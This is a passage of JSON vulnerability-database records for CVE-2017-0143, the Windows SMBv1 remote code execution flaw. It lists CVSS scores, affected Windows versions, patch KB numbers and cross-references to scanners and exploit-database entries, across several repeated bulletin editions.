"KBMS16-110, 3187754", "KB4012217", "KB4012215", "KB4013198", "KB3177186", "KB3210721", "KB4012598", "KB4012212"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-10T18:58:50", "differentElements": ["msAffectedSoftware"], "edition": 27}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-10T20:44:44", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-09T06:50:25", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-09T06:50:25", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012217", "KB3205409", "KB4012215", "KB3213986", "KBMS16-110, 3187754", "KB3210721", "KB4013429", "KB4013198", "KB4012214", "KB3177186", "KB4012213", "KB4012212", "KB3205401", "KB4012598", "KB4012216", "KB3210720", "KB3212646", "KB4012606"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-10T20:44:44", "differentElements": ["msAffectedSoftware"], "edition": 28}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-11T08:48:00", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:156196"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27613"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-11T08:48:00", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-11T08:48:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012598", "KB4013198", "KB3177186", "KB4013429", "KB3210721", "KB4012606", "KBMS16-110, 3187754", "KB4012214", "KB4012212", "KB3213986", "KB3205401", "KB4012213", "KB3212646", "KB3210720", "KB4012215", "KB4012217", "KB3205409", "KB4012216"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", 